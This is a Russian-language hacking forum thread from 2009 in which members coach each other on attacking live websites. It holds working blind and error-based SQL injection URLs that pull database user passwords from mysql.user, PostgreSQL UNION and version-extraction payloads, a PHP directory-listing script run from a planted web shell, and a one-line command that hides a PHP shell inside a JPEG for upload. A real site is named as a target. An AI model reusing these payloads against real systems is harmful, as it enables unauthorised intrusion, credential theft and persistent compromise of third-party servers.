Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    942
    Likes Received:
    428
    Reputations:
    139
    собстно нет.
    http://sk-kr.ru/index.php?id=2
    Здесб баг в самом скрипте, вы не вызываете ошибку, она вызвана каким то драгим фактором.
     
    1 person likes this.
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    экранирование кавычек
    использую char(), hex() и тп
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Нету в модексе скулей. Точнее есть, но как-бэ нет :) Во всяком случае в последнем.

    В этих параметрах можешь даже и не пробовать
     
    #8963 Kakoytoxaker, 23 Sep 2009
    Last edited: 23 Sep 2009
    2 people like this.
  4. ph4nt0m

    ph4nt0m Member

    Joined:
    10 Aug 2009
    Messages:
    11
    Likes Received:
    15
    Reputations:
    0
    спасибо, покопаюсь дальше, надеюсь найду тайную дверцу в чрево сайта...
    ведь я правильно понял : Точнее есть, но как-бэ нет что дырка есть но не в этом параметре, теперь буду пробовать из спортивного интереса.
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    В таком случае рекоммендую скачать код. Просто так, удалённо замучаешься и врятли найдёшь.

    Хотя эта версия не последняя, про неё точно сказать не могу
     
    2 people like this.
  6. 2Fed123

    2Fed123 Banned

    Joined:
    26 Feb 2009
    Messages:
    56
    Likes Received:
    5
    Reputations:
    0
    Провожу blind инъекцию первый раз,вначале узнал имя юзера таким запросом http://site/printerfriendlynews.php?newsid=1631+AND+ascii(lowe r(substring(user(),1,1)))>1
    b и так до его имени,теперь как узнать его пароль?
     
  7. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Если ветка >= 5
    если есть доступ к mysql,

    то

    Code:
    SELECT password FROM mysql.user WHERE user=0x0000
    где 0000 - имя твоего пользователя в хексе.
     
  8. 2Fed123

    2Fed123 Banned

    Joined:
    26 Feb 2009
    Messages:
    56
    Likes Received:
    5
    Reputations:
    0
    Неполучается,есть таблицы user
     
  9. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    942
    Likes Received:
    428
    Reputations:
    139
    2Fed123, вашим запросом вы узнали текущего юзера базы данных.

    Пробуйте так:
    Code:
    www.site.com/index.php?id=1+AND+ascii(lower(substring((SELECT+user+from+user+LIMIT+1),1,1)))>1
    Code:
    www.site.com/index.php?id=1+AND+ascii(lower(substring((SELECT+password+from+mysql.user+WHERE+user="ВАШ ЮЗЕР"+LIMIT+1),1,1)))>1
    Ну и так далее перебирайте.
     
    #8969 Ins3t, 23 Sep 2009
    Last edited: 23 Sep 2009
    1 person likes this.
  10. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    319
    Likes Received:
    110
    Reputations:
    18
    Вопрос такой,есть шелл необходимо спарсить название папок
    /юзер/папка/domain.com/
    нужны название всех папок из путя,т.к у юзверей в разных папках домены лежат.
    реверс по айпи не катит там,сеть айпи висит.
    видел кто нить подобное?
    руками не вариант
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    PHP:
    <pre>
    <?php 
    @set_time_limit(0); 
    @
    ini_set("display_errors","1");
    @
    ignore_user_abort(1);

    $l_folder '/юзер/папка/domain.com'// Полный абсолютный путь к папке

    //Функция рекурсивного получения списка файлов и папок
    function fold($rootDir$allData=array()) {
        
    $invisibleFileNames = array(".""..");
        
    $dirContent scandir($rootDir);
        foreach(
    $dirContent as $key => $content) {
            
    $path $rootDir.'/'.$content;
            if(!
    in_array($content$invisibleFileNames)) {
                if(
    is_file($path) && is_readable($path)) {
                     
    preg_match('|\/(.*)\/|',$path,$res);
                     
    $allData[0][] = $path;//Файлы
                     
    $allData[1][] = $res[0];//папки
                
    }elseif(is_dir($path) && is_readable($path)) {
                    
    $allData fold($path$allData);
                }
            }
        }
        return 
    $allData;
    }

    $b fold($l_folder);
    print_r($b);
    ?>
    </pre>
     
    1 person likes this.
  12. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    581
    Reputations:
    256
    Если есть возможно выполнять команды, тогда:
    Code:
    find /юзер/папка/domain.com/ -type d
    Если надо переходить по символическим ссылкам, тогда добавь -L
    Пример:
    Code:
    $ find -L /tmp -type d
    /tmp
    /tmp/launch-2sW0uR
    /tmp/launch-DM3FAL
    /tmp/launch-DSlIgu
    /tmp/launch-hrAmOc
    /tmp/launchd-229.B1EiU1
    /tmp/ssh-yqYA4n2bZI
     
    1 person likes this.
  13. ATLANT_93

    ATLANT_93 New Member

    Joined:
    22 Sep 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Как в изображение встроить код?
     
  14. E-AL

    E-AL Elder - Старейшина

    Joined:
    3 Oct 2007
    Messages:
    36
    Likes Received:
    22
    Reputations:
    0
    ATLANT_93 если ты хочешь присоединить троя или вирус, то джойнером. Но какое это отношение имеет к уязвимостям и данной теме?
     
  15. ATLANT_93

    ATLANT_93 New Member

    Joined:
    22 Sep 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Нет я хочу засунуть код на php в изображение
     
  16. Gray_Wolf

    Gray_Wolf Active Member

    Joined:
    7 Mar 2009
    Messages:
    377
    Likes Received:
    135
    Reputations:
    10
    Есть страница ***?id=1
    Если я пытаюсь что-то дописать в ID (+, +--+, 2-1, /*)
    То получаю следующее:

    Code:
    Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: syntax error at or near "=" at character 642 in /var/www/html/dbms/trade.php on line 1099
    
    Warning: pg_numrows(): supplied argument is not a valid PostgreSQL result resource in /var/www/html/dbms/trade.php on line 1101
    Можно что-то из этого вытащить?
     
  17. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    942
    Likes Received:
    428
    Reputations:
    139
    Судя по ошибке - есть вероятность инъекции. База данных - PostgreSQL
    Коментарий "/*" не прокатит, так как даный коментарий должен быть закрыт, используйте "--".
    Попробуйте вывесть системную информацию:
    Code:
    ***id=1+and+1=cast((SELECT+version()||chr(58)||current_user||chr(58)||current_database())+as+int)--
    
    И подобрать количество полей:

    Есть возможность использования конструкции order by

    ***id=1+order+by+100--
    Или
    ***id=1+union+select+null,null,null,null,null,null--
    или:
    ***id=1+union+select+1,2,3,4,5,6--
     
    #8977 Ins3t, 24 Sep 2009
    Last edited: 24 Sep 2009
    1 person likes this.
  18. Gray_Wolf

    Gray_Wolf Active Member

    Joined:
    7 Mar 2009
    Messages:
    377
    Likes Received:
    135
    Reputations:
    10
    2Ins3t
    чтобы я не дописывал кроме числа, всегда получаю выше описанную ошибку...
     
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Поясни пожалуйста, что это за хренотень, и от чего, по твоему, это должно помогать.

    ATLANT_93
    По поводу шелла в картинке.
    1 Метаданные
    2 Просто переименовать расширение php файла
    3 В конец файла

    Пролезет или нет зависит ТОЛЬКО от проверок при загрузке, и манипуляции с FF D9 мне не понятны.

    Gray_Wolf
    Линк давай в тему, это не клуб экстрасенсов
     
    1 person likes this.
  20. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    ага а

    $cat pic.jpg shell.php > poisoned.jpg

    это способ не знать про хекс эдитор.

    Гвозди можно забивать микроскопом, но зачем?
    Зачем делать магический ритуал из простой вещи?
    Конечно применить хекс-эдитор это мегахакерский ход. Двигать байты, делать при этом серьезное лицо, это круто.
     
    #8980 geezer.code, 24 Sep 2009
    Last edited: 24 Sep 2009
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.